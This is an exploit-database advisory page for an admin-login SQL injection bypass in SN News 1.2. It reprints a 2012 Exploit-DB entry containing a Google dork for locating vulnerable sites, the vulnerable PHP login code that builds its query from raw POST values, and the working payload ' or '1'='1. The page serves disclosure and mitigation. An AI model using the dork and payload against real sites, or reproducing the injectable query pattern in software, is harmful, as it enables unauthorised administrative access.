SN News - exploit.company

vendor:

SN News

by:

Pr0T3cT10n

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: SN News

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:phpbrasil:sn_news

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2012

SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability

SN News version 1.2 is vulnerable to a remote SQL injection vulnerability in the /admin/logar.php file. The vulnerability exists due to insufficient validation of the $login and $senha variables in the file. An attacker can inject a malicious SQL query into the $login and $senha variables to bypass the admin login screen.

Mitigation:

Validate user input and use prepared statements to prevent SQL injection attacks.

Source

Exploit-DB raw data:

##############################################################################
## SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability
## Google Dork: "snews/visualiza.php?id="
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Date: 06/06/2012
## Version: 1.2
## Software Link: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
## ISRAEL
##############################################################################
##          Author will be not responsible for any damage.
##############################################################################
## Vulnerable Code - /admin/logar.php [4-15]:
4.$login = $_POST["login"];
5.$senha = $_POST["senha"];
6.$sql   = "select * from news_adm where login='$login' AND senha='$senha'";
7.$query = mysql_query($sql);
8.$nr    = mysql_num_rows($query);
9.if($nr>0){
10.$_SESSION["admin"] = "on";
11.echo "<script>
12.location.href='../'
13.</script>
14.";
15.}
## NOTE:
## As you can see there is no validation or any filter to variables $login and $senha.
## See line 6, so you can inject sql query by using $login and $senha variables.
## SQL Injection PoC:
## http://127.0.0.1/sn_news/admin/login.htm
## Login: ' or '1'='1
## Senha: ' or '1'='1
## This injection will bypass the admin login screen.
##############################################################################
# Cya :)
# 0x31337.net
##############################################################################